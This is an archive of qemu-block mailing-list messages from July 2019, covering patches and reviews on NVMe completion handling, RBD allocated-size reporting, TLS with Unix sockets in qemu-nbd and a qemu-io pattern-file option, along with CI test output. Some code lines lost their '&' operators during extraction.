>  1 file changed, 1 insertion(+), 4 deletions(-)
> 
> diff --git a/block/nvme.c b/block/nvme.c
> index 73ed5fa75f..6d4e7f3d83 100644
> --- a/block/nvme.c
> +++ b/block/nvme.c
> @@ -315,7 +315,7 @@ static bool nvme_process_completion(BDRVNVMeState *s, 
> NVMeQueuePair *q)
>  while (q->inflight) {
>  int16_t cid;
>  c = (NvmeCqe *)>cq.queue[q->cq.head * NVME_CQ_ENTRY_BYTES];
> -if (!c->cid || (le16_to_cpu(c->status) & 0x1) == q->cq_phase) {
> +if ((le16_to_cpu(c->status) & 0x1) == q->cq_phase) {
>  break;
>  }
>  q->cq.head = (q->cq.head + 1) % NVME_QUEUE_SIZE;
> @@ -339,10 +339,7 @@ static bool nvme_process_completion(BDRVNVMeState *s, 
> NVMeQueuePair *q)
>  qemu_mutex_unlock(>lock);
>  req.cb(req.opaque, nvme_translate_error(c));
>  qemu_mutex_lock(>lock);
> -c->cid = cpu_to_le16(0);
>  q->inflight--;
> -/* Flip Phase Tag bit. */
> -c->status = cpu_to_le16(le16_to_cpu(c->status) ^ 0x1);
>  progress = true;
>  }
>  if (progress) {
> 




signature.asc
Description: OpenPGP digital signature

Re: [Qemu-block] [PATCH v3] block/rbd: implement .bdrv_get_allocated_file_size callback

2019-07-05 Thread Stefano Garzarella

On Fri, Jul 05, 2019 at 11:58:43AM +0200, Max Reitz wrote:
> On 05.07.19 11:32, Stefano Garzarella wrote:
> > This patch allows 'qemu-img info' to show the 'disk size' for
> > the RBD images that have the fast-diff feature enabled.
> > 
> > If this feature is enabled, we use the rbd_diff_iterate2() API
> > to calculate the allocated size for the image.
> > 
> > Signed-off-by: Stefano Garzarella 
> > ---
> > v3:
> >   - return -ENOTSUP instead of -1 when fast-diff is not available
> > [John, Jason]
> > v2:
> >   - calculate the actual usage only if the fast-diff feature is
> > enabled [Jason]
> > ---
> >  block/rbd.c | 54 +
> >  1 file changed, 54 insertions(+)
> 
> Well, the librbd documentation is non-existing as always, but while
> googling, I at least found that libvirt has exactly the same code.  So I
> suppose it must be quite correct, then.
> 

While I wrote this code I took a look at libvirt implementation and also
at the "rbd" tool in the ceph repository: compute_image_disk_usage() in
src/tools/rbd/action/DiskUsage.cc

> > diff --git a/block/rbd.c b/block/rbd.c
> > index 59757b3120..b6bed683e5 100644
> > --- a/block/rbd.c
> > +++ b/block/rbd.c
> > @@ -1084,6 +1084,59 @@ static int64_t qemu_rbd_getlength(BlockDriverState 
> > *bs)
> >  return info.size;
> >  }
> >  
> > +static int rbd_allocated_size_cb(uint64_t offset, size_t len, int exists,
> > + void *arg)
> > +{
> > +int64_t *alloc_size = (int64_t *) arg;
> > +
> > +if (exists) {
> > +(*alloc_size) += len;
> > +}
> > +
> > +return 0;
> > +}
> > +
> > +static int64_t qemu_rbd_get_allocated_file_size(BlockDriverState *bs)
> > +{
> > +BDRVRBDState *s = bs->opaque;
> > +uint64_t flags, features;
> > +int64_t alloc_size = 0;
> > +int r;
> > +
> > +r = rbd_get_flags(s->image, );
> > +if (r < 0) {
> > +return r;
> > +}
> > +
> > +r = rbd_get_features(s->image, );
> > +if (r < 0) {
> > +return r;
> > +}
> > +
> > +/*
> > + * We use rbd_diff_iterate2() only if the RBD image have fast-diff
> > + * feature enabled. If it is disabled, rbd_diff_iterate2() could be
> > + * very slow on a big image.
> > + */
> > +if (!(features & RBD_FEATURE_FAST_DIFF) ||
> > +(flags & RBD_FLAG_FAST_DIFF_INVALID)) {
> > +return -ENOTSUP;
> > +}
> > +
> > +/*
> > + * rbd_diff_iterate2(), if the source snapshot name is NULL, invokes
> > + * the callback on all allocated regions of the image.
> > + */
> > +r = rbd_diff_iterate2(s->image, NULL, 0,
> > +  bs->total_sectors * BDRV_SECTOR_SIZE, 0, 1,
> > +  _allocated_size_cb, _size);
> 
> But I have a question.  This is basically block_status, right?  So it
> gives us information on which areas are allocated and which are not.
> The result thus gives us a lower bound on the allocation size, but is it
> really exactly the allocation size?
> 
> There are two things I’m concerned about:
> 
> 1. What about metadata?

Good question, I don't think it includes the size used by metadata and I
don't know if there is a way to know it. I'll check better.

> 
> 2. If you have multiple snapshots, this will only report the overall
> allocation information, right?  So say there is something like this:
> 
> (“A” means an allocated MB, “-” is an unallocated MB)
> 
> Snapshot 1: ---
> Snapshot 2: --A
> Snapshot 3: ---
> 
> I think the allocated data size is the number of As in total (13 MB).
> But I suppose this API will just return 7 MB, because it looks on
> everything an it sees the whole image range (7 MB) to be allocated.  It
> doesn’t report in how many snapshots some region is allocated.

Looking at the documentation of rbd_diff_iterate2() [1] they says:

 *If the source snapshot name is NULL, we
 * interpret that as the beginning of time and return all allocated
 * regions of the image.

But I don't know the answer of your question (maybe Jason can help
here).
I should check better the implementation to understand if I can cycle
on all snapshot to get the exact allocated data size.

https://github.com/ceph/ceph/blob/master/src/include/rbd/librbd.h#L925

I'll back when I have more details on the rbd implementation to better
answer your questions.

Thanks,
Stefano

Re: [Qemu-block] [Qemu-devel] [PATCH v2 RFC] qemu-nbd: Permit TLS with Unix sockets

2019-07-05 Thread Daniel P . Berrangé

On Wed, Jul 03, 2019 at 05:47:07PM -0500, Eric Blake wrote:

> +== check TLS works over Unix ==
> +image: nbd+unix://?socket=SOCKET
> +file format: nbd
> +virtual size: 64 MiB (67108864 bytes)
> +disk size: unavailable
> +image: nbd+unix://?socket=SOCKET
> +file format: nbd
> +virtual size: 64 MiB (67108864 bytes)
> +disk size: unavailable
> +qemu-nbd: Certificate does not match the hostname 0.0.0.0

Seeing 0.0.0.0 is very odd since we don't specify that on the CLI anywhere.

It looks like this is a side effect of reusing the "bindto" variable in
--list mode, getting the default bind address of 0.0.0.0.  We should
ensure that this variable defaults to NULL when in --list mode I think,
which will probably highlight the tlssession.c bug i mentioned.


Regards,
Daniel
-- 
|: https://berrange.com  -o-https://www.flickr.com/photos/dberrange :|
|: https://libvirt.org -o-https://fstop138.berrange.com :|
|: https://entangle-photo.org-o-https://www.instagram.com/dberrange :|

Re: [Qemu-block] [Qemu-devel] [PATCH v2 RFC] qemu-nbd: Permit TLS with Unix sockets

2019-07-05 Thread Daniel P . Berrangé

On Fri, Jul 05, 2019 at 11:31:51AM +0200, Max Reitz wrote:
> On 04.07.19 00:47, Eric Blake wrote:



> > diff --git a/tests/qemu-iotests/233.out b/tests/qemu-iotests/233.out
> > index 9b46284ab0de..b86bee020649 100644
> > --- a/tests/qemu-iotests/233.out
> > +++ b/tests/qemu-iotests/233.out
> 
> [...]
> 
> > +== check TLS works over Unix ==
> > +image: nbd+unix://?socket=SOCKET
> > +file format: nbd
> > +virtual size: 64 MiB (67108864 bytes)
> > +disk size: unavailable
> 
> This has worked surprisingly well considering you did not pass tls-hostname.
> 
> On the same note: If I remove the tls-hostname option from the “perform
> I/O over TLS” test, it keeps working.

Yeah, that's a bug in crypto/tlssession.c.

It is assuming that the hostname will always be provided for sessions
in client mode, which was valid previously as all sessions were TCP
based. ie it assumed that if hostname was NULL, it was doing server
side certificate validation.

That assumption is bogus now we allow sessions on non-TCP, so we must
fix the code thus:


@@ -365,6 +367,14 @@ qcrypto_tls_session_check_certificate(QCryptoTLSSession 
*session,
 goto error;
 }
 }
+if (!session->hostname &&
+session->creds->endpoint ==
+QCRYPTO_TLS_CREDS_ENDPOINT_CLIENT) {
+error_setg(errp,
+   "No hostname available to validate against "
+   "server's x509 certificate");
+goto error;
+}
 if (session->hostname) {
 if (!gnutls_x509_crt_check_hostname(cert, session->hostname)) {
 error_setg(errp,



Regards,
Daniel
-- 
|: https://berrange.com  -o-https://www.flickr.com/photos/dberrange :|
|: https://libvirt.org -o-https://fstop138.berrange.com :|
|: https://entangle-photo.org-o-https://www.instagram.com/dberrange :|

Re: [Qemu-block] [Qemu-devel] [PATCH v2 RFC] qemu-nbd: Permit TLS with Unix sockets

2019-07-05 Thread Daniel P . Berrangé

On Wed, Jul 03, 2019 at 05:47:07PM -0500, Eric Blake wrote:
> Although you generally won't use encryption with a Unix socket (after
> all, everything is local, so why waste the CPU power), there are
> situations in testsuites where Unix sockets are much nicer than TCP
> sockets.  Since nbdkit allows encryption over both types of sockets,
> it makes sense for qemu-nbd to do likewise.
> 
> The restriction has been present since its introduction in commits
> 145614a1 and 75822a12 (v2.6), where the former documented the
> limitation but did not provide any additional explanation why it was
> added; but looking closer, it seems the most likely reason is that
> x509 verification requires a hostname. But we can do the same as
> migration did, and add a tls-hostname parameter to supply that
> information.

Yes, the x509 cert validation is precisely the reason.

The client must validate the hostname it is connecting to, against
the x509 certificate received from the server. If it doesn't use
IP, then it had no hostnmae to validate the cert against.

Since that time though, we added support for PSK credentials with
TLS which requires no hostname validation, so the restriction no
longer makes sense.

Adding ability to set a tls-hostname parameter further enables its
use with x509 credentials.

> RFC: The test is racy - it sometimes passes, and sometimes fails with:
> 
>  == check TLS with authorization over Unix ==
>  qemu-img: Could not open 
> 'driver=nbd,path=SOCKET,tls-creds=tls0,tls-hostname=localhost': Failed to 
> read option reply: Cannot read from TLS channel: Input/output error
> -qemu-img: Could not open 
> 'driver=nbd,path=SOCKET,tls-creds=tls0,tls-hostname=localhost': Failed to 
> read option reply: Cannot read from TLS channel: Input/output error
> +qemu-img: Could not open 
> 'driver=nbd,path=SOCKET,tls-creds=tls0,tls-hostname=localhost': Failed to 
> read option reply: Cannot read from TLS channel: Software caused connection 
> abort

It is a bit complex to debug this because unfortunately gnutls API
doesn't allow us to propagate the root cause error accurately.

We return ECONNABORTED when GNUTLS reports GNUTLS_E_PREMATURE_TERMINATION.
It reports this when it tries to read a packet header and gets EOF from
the socket.

We return EIO in other cases where there's no GNUTLS error code we
want to handle explicitly. With some debugging I find that GNUTLS
is returned GNUTLS_E_PULL_ERROR which is a generic code it returns
whenever the read() callback fails for a reason which isn't EAGAIN.

With more debugging I find the original recvfrom() is returning
ECONNRESET, so this is basically just another name for EOF.

I'm curious why we see EOF sometimes and ECONNRESET at other times.
I disabled the qio_channel_shutdown call on the server and that just
changed to a different race. Now we sometimes get ECONNRESET, and
sometimes get EIO when trying to send the first NBD option header
instead.

> I suspect that there is a bug in the qio TLS channel code when it
> comes to handling a failed TLS handshake, which results in the racy
> output. I'll need help solving that first.  It might also be nice if
> we had a bit more visibility into the gnutls error message when TLS
> handshake fails.

I'm not sure there is a bug - it feels like there's just a few different
shutdown scenarios we can hit based on timing, due to the fact there is
no synchronization with the client when we drop the connection if
authz fails.

> @@ -1624,12 +1629,25 @@ static int nbd_open(BlockDriverState *bs, QDict 
> *options, int flags,
>  goto error;
>  }
> 
> -/* TODO SOCKET_ADDRESS_KIND_FD where fd has AF_INET or AF_INET6 */
> -if (s->saddr->type != SOCKET_ADDRESS_TYPE_INET) {
> -error_setg(errp, "TLS only supported over IP sockets");
> +switch (s->saddr->type) {
> +case SOCKET_ADDRESS_TYPE_INET:
> +hostname = s->saddr->u.inet.host;
> +if (qemu_opt_get(opts, "tls-hostname")) {
> +error_setg(errp, "tls-hostname not required with inet 
> socket");
> +goto error;
> +}

We don't need to forbid this. Consider if you have setup an SSH tunnel
from localhost:someport, over to your remote server. NBD will get told
to connect to localhost, but will need to validate the cert against
the real remote hostname.

> +break;
> +case SOCKET_ADDRESS_TYPE_UNIX:
> +hostname = qemu_opt_get(opts, "tls-hostname");
> +break;
> +default:
> +/* TODO SOCKET_ADDRESS_KIND_FD where fd has AF_INET or AF_INET6 
> */
> +error_setg(errp, "TLS only supported over IP or Unix sockets");
>  goto error;
>  }

I don't think we need any of this switch, instead just something like thus:

   hostname = qemu_opt_get(opts, "tls-hostname");
   if (!hostname) {
   if (s->saddr->type == SOCKET_ADDRESS_TYPE_INET) {
   hostname  = s->sadddr->u.inet.host;

[Qemu-block] [PATCH v7] qemu-io: add pattern file for write command

2019-07-05 Thread Denis Plotnikov

The patch allows to provide a pattern file for write
command. There was no similar ability before.

Signed-off-by: Denis Plotnikov 
---
v7:
  * fix variable naming
  * make code more readable
  * extend help for write command

v6:
  * the pattern file is read once to reduce io

v5:
  * file name initiated with null to make compilers happy

v4:
  * missing signed-off clause added

v3:
  * missing file closing added
  * exclusive flags processing changed
  * buffer void* converted to char* to fix pointer arithmetics
  * file reading error processing added
---
 qemu-io-cmds.c | 86 ++
 1 file changed, 80 insertions(+), 6 deletions(-)

diff --git a/qemu-io-cmds.c b/qemu-io-cmds.c
index 09750a23ce..495170380a 100644
--- a/qemu-io-cmds.c
+++ b/qemu-io-cmds.c
@@ -343,6 +343,66 @@ static void *qemu_io_alloc(BlockBackend *blk, size_t len, 
int pattern)
 return buf;
 }
 
+static void *qemu_io_alloc_from_file(BlockBackend *blk, size_t len,
+ char *file_name)
+{
+char *buf, *buf_origin;
+FILE *f = fopen(file_name, "r");
+int pattern_len;
+
+if (!f) {
+printf("'%s': %s\n", file_name, strerror(errno));
+return NULL;
+}
+
+if (qemuio_misalign) {
+len += MISALIGN_OFFSET;
+}
+
+buf_origin = buf = blk_blockalign(blk, len);
+
+pattern_len = fread(buf, sizeof(char), len, f);
+
+if (ferror(f)) {
+printf("'%s': %s\n", file_name, strerror(errno));
+goto error;
+}
+
+if (pattern_len == 0) {
+printf("'%s' is empty\n", file_name);
+goto error;
+}
+
+fclose(f);
+
+if (len > pattern_len) {
+char *file_buf = g_malloc(sizeof(char) * pattern_len);
+memcpy(file_buf, buf, pattern_len);
+len -= pattern_len;
+buf += pattern_len;
+
+while (len > 0) {
+size_t len_to_copy = MIN(pattern_len, len);
+
+memcpy(buf, file_buf, len_to_copy);
+
+len -= len_to_copy;
+buf += len_to_copy;
+}
+qemu_vfree(file_buf);
+}
+
+if (qemuio_misalign) {
+buf_origin += MISALIGN_OFFSET;
+}
+
+return buf_origin;
+
+error:
+qemu_vfree(buf_origin);
+return NULL;
+}
+
 static void qemu_io_free(void *p)
 {
 if (qemuio_misalign) {
@@ -949,6 +1009,7 @@ static void write_help(void)
 " -n, -- with -z, don't allow slow fallback\n"
 " -p, -- ignored for backwards compatibility\n"
 " -P, -- use different pattern to fill file\n"
+" -s, -- use a pattern file to fill the write buffer\n"
 " -C, -- report statistics in a machine parsable format\n"
 " -q, -- quiet mode, do not show I/O statistics\n"
 " -u, -- with -z, allow unmapping\n"
@@ -965,7 +1026,7 @@ static const cmdinfo_t write_cmd = {
 .perm   = BLK_PERM_WRITE,
 .argmin = 2,
 .argmax = -1,
-.args   = "[-bcCfnquz] [-P pattern] off len",
+.args   = "[-bcCfnquz] [-P pattern | -s source_file] off len",
 .oneline= "writes a number of bytes at a specified offset",
 .help   = write_help,
 };
@@ -974,7 +1035,7 @@ static int write_f(BlockBackend *blk, int argc, char 
**argv)
 {
 struct timeval t1, t2;
 bool Cflag = false, qflag = false, bflag = false;
-bool Pflag = false, zflag = false, cflag = false;
+bool Pflag = false, zflag = false, cflag = false, sflag = false;
 int flags = 0;
 int c, cnt, ret;
 char *buf = NULL;
@@ -983,8 +1044,9 @@ static int write_f(BlockBackend *blk, int argc, char 
**argv)
 /* Some compilers get confused and warn if this is not initialized.  */
 int64_t total = 0;
 int pattern = 0xcd;
+char *file_name = NULL;
 
-while ((c = getopt(argc, argv, "bcCfnpP:quz")) != -1) {
+while ((c = getopt(argc, argv, "bcCfnpP:quzs:")) != -1) {
 switch (c) {
 case 'b':
 bflag = true;
@@ -1020,6 +1082,10 @@ static int write_f(BlockBackend *blk, int argc, char 
**argv)
 case 'z':
 zflag = true;
 break;
+case 's':
+sflag = true;
+file_name = g_strdup(optarg);
+break;
 default:
 qemuio_command_usage(_cmd);
 return -EINVAL;
@@ -1051,8 +1117,9 @@ static int write_f(BlockBackend *blk, int argc, char 
**argv)
 return -EINVAL;
 }
 
-if (zflag && Pflag) {
-printf("-z and -P cannot be specified at the same time\n");
+if ((int)zflag + (int)Pflag + (int)sflag > 1) {
+printf("Only one of -z, -P, and -s"
+   "can be specified at the same time\n");
 return -EINVAL;
 }
 
@@ -1088,7 +1155,14 @@ static int write_f(BlockBackend *blk, int argc, char 
**argv)
 }
 
 if (!zflag) {
-buf = qemu_io_alloc(blk, count, pattern);
+if (sflag) {
+buf = qemu_io_alloc_from_file(blk, count, file_name);
+if (!buf) {
+return -EINVAL;
+}
+} else {

Re: [Qemu-block] [PATCH v3] block/rbd: implement .bdrv_get_allocated_file_size callback

2019-07-05 Thread Max Reitz

On 05.07.19 11:32, Stefano Garzarella wrote:
> This patch allows 'qemu-img info' to show the 'disk size' for
> the RBD images that have the fast-diff feature enabled.
> 
> If this feature is enabled, we use the rbd_diff_iterate2() API
> to calculate the allocated size for the image.
> 
> Signed-off-by: Stefano Garzarella 
> ---
> v3:
>   - return -ENOTSUP instead of -1 when fast-diff is not available
> [John, Jason]
> v2:
>   - calculate the actual usage only if the fast-diff feature is
> enabled [Jason]
> ---
>  block/rbd.c | 54 +
>  1 file changed, 54 insertions(+)

Well, the librbd documentation is non-existing as always, but while
googling, I at least found that libvirt has exactly the same code.  So I
suppose it must be quite correct, then.

> diff --git a/block/rbd.c b/block/rbd.c
> index 59757b3120..b6bed683e5 100644
> --- a/block/rbd.c
> +++ b/block/rbd.c
> @@ -1084,6 +1084,59 @@ static int64_t qemu_rbd_getlength(BlockDriverState *bs)
>  return info.size;
>  }
>  
> +static int rbd_allocated_size_cb(uint64_t offset, size_t len, int exists,
> + void *arg)
> +{
> +int64_t *alloc_size = (int64_t *) arg;
> +
> +if (exists) {
> +(*alloc_size) += len;
> +}
> +
> +return 0;
> +}
> +
> +static int64_t qemu_rbd_get_allocated_file_size(BlockDriverState *bs)
> +{
> +BDRVRBDState *s = bs->opaque;
> +uint64_t flags, features;
> +int64_t alloc_size = 0;
> +int r;
> +
> +r = rbd_get_flags(s->image, );
> +if (r < 0) {
> +return r;
> +}
> +
> +r = rbd_get_features(s->image, );
> +if (r < 0) {
> +return r;
> +}
> +
> +/*
> + * We use rbd_diff_iterate2() only if the RBD image have fast-diff
> + * feature enabled. If it is disabled, rbd_diff_iterate2() could be
> + * very slow on a big image.
> + */
> +if (!(features & RBD_FEATURE_FAST_DIFF) ||
> +(flags & RBD_FLAG_FAST_DIFF_INVALID)) {
> +return -ENOTSUP;
> +}
> +
> +/*
> + * rbd_diff_iterate2(), if the source snapshot name is NULL, invokes
> + * the callback on all allocated regions of the image.
> + */
> +r = rbd_diff_iterate2(s->image, NULL, 0,
> +  bs->total_sectors * BDRV_SECTOR_SIZE, 0, 1,
> +  _allocated_size_cb, _size);

But I have a question.  This is basically block_status, right?  So it
gives us information on which areas are allocated and which are not.
The result thus gives us a lower bound on the allocation size, but is it
really exactly the allocation size?

There are two things I’m concerned about:

1. What about metadata?

2. If you have multiple snapshots, this will only report the overall
allocation information, right?  So say there is something like this:

(“A” means an allocated MB, “-” is an unallocated MB)

Snapshot 1: ---
Snapshot 2: --A
Snapshot 3: ---

I think the allocated data size is the number of As in total (13 MB).
But I suppose this API will just return 7 MB, because it looks on
everything an it sees the whole image range (7 MB) to be allocated.  It
doesn’t report in how many snapshots some region is allocated.

Max

> +if (r < 0) {
> +return r;
> +}
> +
> +return alloc_size;
> +}
> +
>  static int coroutine_fn qemu_rbd_co_truncate(BlockDriverState *bs,
>   int64_t offset,
>   PreallocMode prealloc,
> @@ -1291,6 +1344,7 @@ static BlockDriver bdrv_rbd = {
>  .bdrv_get_info  = qemu_rbd_getinfo,
>  .create_opts= _rbd_create_opts,
>  .bdrv_getlength = qemu_rbd_getlength,
> +.bdrv_get_allocated_file_size = qemu_rbd_get_allocated_file_size,
>  .bdrv_co_truncate   = qemu_rbd_co_truncate,
>  .protocol_name  = "rbd",
>  
> 




signature.asc
Description: OpenPGP digital signature

Re: [Qemu-block] [PATCH v2 RFC] qemu-nbd: Permit TLS with Unix sockets

2019-07-05 Thread Max Reitz

On 04.07.19 00:47, Eric Blake wrote:
> Although you generally won't use encryption with a Unix socket (after
> all, everything is local, so why waste the CPU power), there are
> situations in testsuites where Unix sockets are much nicer than TCP
> sockets.  Since nbdkit allows encryption over both types of sockets,
> it makes sense for qemu-nbd to do likewise.

Hmm.  The code is simple enough, so I don’t see a good reason not to.

> The restriction has been present since its introduction in commits
> 145614a1 and 75822a12 (v2.6), where the former documented the
> limitation but did not provide any additional explanation why it was
> added; but looking closer, it seems the most likely reason is that
> x509 verification requires a hostname. But we can do the same as
> migration did, and add a tls-hostname parameter to supply that
> information.
> 
> Signed-off-by: Eric Blake 
> 
> ---
> 
> Since this is now adding a new qemu-nbd command-line option, as well
> as new QMP for blockdev-add, it has missed 4.1 softfreeze and should
> probably be delayed to 4.2.
> 
> RFC: The test is racy - it sometimes passes, and sometimes fails with:
> 
>  == check TLS with authorization over Unix ==
>  qemu-img: Could not open 
> 'driver=nbd,path=SOCKET,tls-creds=tls0,tls-hostname=localhost': Failed to 
> read option reply: Cannot read from TLS channel: Input/output error
> -qemu-img: Could not open 
> 'driver=nbd,path=SOCKET,tls-creds=tls0,tls-hostname=localhost': Failed to 
> read option reply: Cannot read from TLS channel: Input/output error
> +qemu-img: Could not open 
> 'driver=nbd,path=SOCKET,tls-creds=tls0,tls-hostname=localhost': Failed to 
> read option reply: Cannot read from TLS channel: Software caused connection 
> abort

Well, the first thing is that over TCP, the reference output shows that
it should indeed fail with ECONNABORTED.  So to me it seems like EIO is
actually the wrong error code.

Um, also, a perhaps stupid question: Why is there no passing test for
client authorization?

> I suspect that there is a bug in the qio TLS channel code when it
> comes to handling a failed TLS handshake, which results in the racy
> output. I'll need help solving that first.  It might also be nice if
> we had a bit more visibility into the gnutls error message when TLS
> handshake fails.

Well, what I can see is that the error code comes from
qcrypto_tls_session_read().  You get ECONNABORTED for
GNUTLS_E_PREMATURE_TERMINATION, and EIO for GNUTLS_E_PULL_ERROR (under
default; but that’s the error that appears if it isn’t
PREMATURE_TERMINATION).

So I suppose you get ECONNABORTED if the first read happens after the
RST is received (or the equivalent on Unix sockets, I have no idea how
they work on the low level); and you get EIO if you try to read before
that (because the TLS connection has just not been established
successfully).

I have experimented a bit, but unfortunately couldn’t find anything to
change the test results in any way... :/

> ---
>  qemu-nbd.texi  |  3 ++
>  qapi/block-core.json   |  5 ++
>  block/nbd.c| 27 +--
>  qemu-nbd.c | 26 ---
>  tests/qemu-iotests/233 | 94 --
>  tests/qemu-iotests/233.out | 61 +++--
>  tests/qemu-iotests/group   |  2 +-
>  7 files changed, 198 insertions(+), 20 deletions(-)
> 
> diff --git a/qemu-nbd.texi b/qemu-nbd.texi
> index 7f55657722bd..764518baef84 100644
> --- a/qemu-nbd.texi
> +++ b/qemu-nbd.texi
> @@ -123,6 +123,9 @@ Store the server's process ID in the given file.
>  Specify the ID of a qauthz object previously created with the
>  --object option. This will be used to authorize connecting users
>  against their x509 distinguished name.
> +@item --tls-hostname=NAME
> +When using list mode with TLS over a Unix socket, supply the hostname
> +to use during validation of the server's x509 certificate.
>  @item -v, --verbose
>  Display extra debugging information.
>  @item -h, --help

qemu-nbd.c has some parameter documentation, too.  Maybe this option
should be listed there.

> diff --git a/qapi/block-core.json b/qapi/block-core.json
> index 0d43d4f37c1a..95da0d44c220 100644
> --- a/qapi/block-core.json
> +++ b/qapi/block-core.json
> @@ -3856,6 +3856,10 @@
>  #
>  # @tls-creds:   TLS credentials ID
>  #
> +# @tls-hostname: Hostname of the server, required only when using x509 based
> +#TLS credentials when @server lacks a hostname (such as
> +#using a Unix socket). (Since 4.1)

Well, 4.2 now.

> +#
>  # @x-dirty-bitmap: A "qemu:dirty-bitmap:NAME" string to query in place of
>  #  traditional "base:allocation" block status (see
>  #  NBD_OPT_LIST_META_CONTEXT in the NBD protocol) (since 3.0)

[...]

> diff --git a/block/nbd.c b/block/nbd.c
> index 81edabbf35ed..ce3db21190ce 100644
> --- a/block/nbd.c
> +++ b/block/nbd.c

[...]

> @@ -1624,12 +1629,25 @@ static int nbd_open(BlockDriverState

Re: [Qemu-block] [Qemu-devel] [PATCH 00/16] nvme: support NVMe v1.3d, SGLs and multiple namespaces

2019-07-05 Thread no-reply

Patchew URL: https://patchew.org/QEMU/20190705072333.17171-1-kl...@birkelund.eu/



Hi,

This series failed the asan build test. Please find the testing commands and
their output below. If you have Docker installed, you can probably reproduce it
locally.

=== TEST SCRIPT BEGIN ===
#!/bin/bash
make docker-image-fedora V=1 NETWORK=1
time make docker-test-debug@fedora TARGET_LIST=x86_64-softmmu J=14 NETWORK=1
=== TEST SCRIPT END ===

PASS 1 fdc-test /x86_64/fdc/cmos
PASS 2 fdc-test /x86_64/fdc/no_media_on_start
PASS 3 fdc-test /x86_64/fdc/read_without_media
==7866==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 4 fdc-test /x86_64/fdc/media_change
PASS 5 fdc-test /x86_64/fdc/sense_interrupt
PASS 6 fdc-test /x86_64/fdc/relative_seek
---
PASS 32 test-opts-visitor /visitor/opts/range/beyond
PASS 33 test-opts-visitor /visitor/opts/dict/unvisited
MALLOC_PERTURB_=${MALLOC_PERTURB_:-$(( ${RANDOM:-0} % 255 + 1))}  
tests/test-coroutine -m=quick -k --tap < /dev/null | ./scripts/tap-driver.pl 
--test-name="test-coroutine" 
==7910==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
==7910==WARNING: ASan is ignoring requested __asan_handle_no_return: stack top: 
0x7ffe02725000; bottom 0x7fcded0f8000; size: 0x00301562d000 (206517227520)
False positive error reports may follow
For details see https://github.com/google/sanitizers/issues/189
PASS 1 test-coroutine /basic/no-dangling-access
---
PASS 11 test-aio /aio/event/wait
PASS 12 test-aio /aio/event/flush
PASS 13 test-aio /aio/event/wait/no-flush-cb
==7926==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 14 test-aio /aio/timer/schedule
PASS 15 test-aio /aio/coroutine/queue-chaining
PASS 16 test-aio /aio-gsource/flush
---
MALLOC_PERTURB_=${MALLOC_PERTURB_:-$(( ${RANDOM:-0} % 255 + 1))}  
tests/test-aio-multithread -m=quick -k --tap < /dev/null | 
./scripts/tap-driver.pl --test-name="test-aio-multithread" 
MALLOC_PERTURB_=${MALLOC_PERTURB_:-$(( ${RANDOM:-0} % 255 + 1))}  
QTEST_QEMU_BINARY=x86_64-softmmu/qemu-system-x86_64 QTEST_QEMU_IMG=qemu-img 
tests/ide-test -m=quick -k --tap < /dev/null | ./scripts/tap-driver.pl 
--test-name="ide-test" 
PASS 1 test-aio-multithread /aio/multi/lifecycle
==7934==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
==7950==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 2 test-aio-multithread /aio/multi/schedule
PASS 1 ide-test /x86_64/ide/identify
==7961==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 3 test-aio-multithread /aio/multi/mutex/contended
PASS 2 ide-test /x86_64/ide/flush
==7972==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 3 ide-test /x86_64/ide/bmdma/simple_rw
==7978==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 4 test-aio-multithread /aio/multi/mutex/handoff
PASS 4 ide-test /x86_64/ide/bmdma/trim
==7989==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 5 test-aio-multithread /aio/multi/mutex/mcs
PASS 5 ide-test /x86_64/ide/bmdma/short_prdt
==8000==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 6 test-aio-multithread /aio/multi/mutex/pthread
PASS 6 ide-test /x86_64/ide/bmdma/one_sector_short_prdt
MALLOC_PERTURB_=${MALLOC_PERTURB_:-$(( ${RANDOM:-0} % 255 + 1))}  
tests/test-throttle -m=quick -k --tap < /dev/null | ./scripts/tap-driver.pl 
--test-name="test-throttle" 
---
PASS 3 test-throttle /throttle/init
PASS 4 test-throttle /throttle/destroy
PASS 5 test-throttle /throttle/have_timer
==8009==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 6 test-throttle /throttle/detach_attach
PASS 7 test-throttle /throttle/config_functions
PASS 8 test-throttle /throttle/accounting
---
PASS 14 test-throttle /throttle/config/max
PASS 15 test-throttle /throttle/config/iops_size
MALLOC_PERTURB_=${MALLOC_PERTURB_:-$(( ${RANDOM:-0} % 255 + 1))}  
tests/test-thread-pool -m=quick -k --tap < /dev/null | ./scripts/tap-driver.pl 
--test-name="test-thread-pool" 
==8007==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
==8017==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 1 test-thread-pool /thread-pool/submit
PASS 2 test-thread-pool /thread-pool/submit-aio
PASS 3 test-thread-pool /thread-pool/submit-co
PASS

Re: [Qemu-block] [Qemu-devel] [PATCH 00/16] nvme: support NVMe v1.3d, SGLs and multiple namespaces

2019-07-05 Thread no-reply

Patchew URL: https://patchew.org/QEMU/20190705072333.17171-1-kl...@birkelund.eu/



Hi,

This series seems to have some coding style problems. See output below for
more information:

Type: series
Subject: [Qemu-devel] [PATCH 00/16] nvme: support NVMe v1.3d, SGLs and multiple 
namespaces
Message-id: 20190705072333.17171-1-kl...@birkelund.eu

=== TEST SCRIPT BEGIN ===
#!/bin/bash
git rev-parse base > /dev/null || exit 0
git config --local diff.renamelimit 0
git config --local diff.renames True
git config --local diff.algorithm histogram
./scripts/checkpatch.pl --mailback base..
=== TEST SCRIPT END ===

Switched to a new branch 'test'
aed82e6 nvme: support multiple namespaces
124aba5 nvme: support scatter gather lists
87ed485 nvme: support multiple block requests per request
a093729 nvme: simplify dma/cmb mappings
